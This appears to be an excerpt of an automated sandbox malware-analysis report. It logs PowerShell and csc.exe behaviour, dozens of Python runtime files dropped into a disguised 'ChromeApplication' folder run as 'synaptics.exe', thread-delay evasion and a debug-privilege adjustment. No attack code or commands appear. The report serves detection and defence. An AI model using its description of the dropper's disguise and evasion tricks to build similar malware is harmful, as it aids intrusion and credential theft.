Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5706Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4178Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_decimal.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32inet.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32clipboard.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32pipe.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\mmapfile.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32job.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32comext\adsi\adsi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_bz2.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32trace.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\isapi\PyISAPI_loader.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\perfmon.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32process.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\md.cp310-win32.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\_win32sysloader.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\select.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32evtlog.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\odbc.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\timer.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\perfmondata.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\sqlite3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_asyncio.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32console.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32crypt.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_uuid.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_ssl.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_overlapped.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32ras.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32wnet.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_msi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\winxpgui.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\dde.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\unicodedata.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\winsound.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32file.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32pdh.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32help.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32transaction.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_queue.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\libcrypto-1_1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32profile.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_elementtree.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32print.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32api.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_socket.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_zoneinfo.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32ts.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_lzma.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_ctypes.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win32.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32lz.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_hashlib.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_sqlite3.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32event.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\mfc140u.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32service.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\_multiprocessing.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\pyexpat.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\_winxptheme.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32security.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\servicemanager.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\Pythonwin.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\libssl-1_1.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32net.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\pythonservice.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\DLLs\libffi-7.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32gui.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32cred.pydJump to dropped file
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeAPI coverage: 3.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2408Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: cacert.pem.0.drBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: powershell.exe, 00000000.00000002.2451566064.0000015C7E77F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3306116050.0000028542059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3304027546.000002853C82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: cacert.pem.0.drBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_00541710 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00541710
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C5BC400 PyThread_start_new_thread,GetProcessHeap,HeapAlloc,_beginthreadex,_errno,GetProcessHeap,HeapFree,CloseHandle,7_2_6C5BC400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
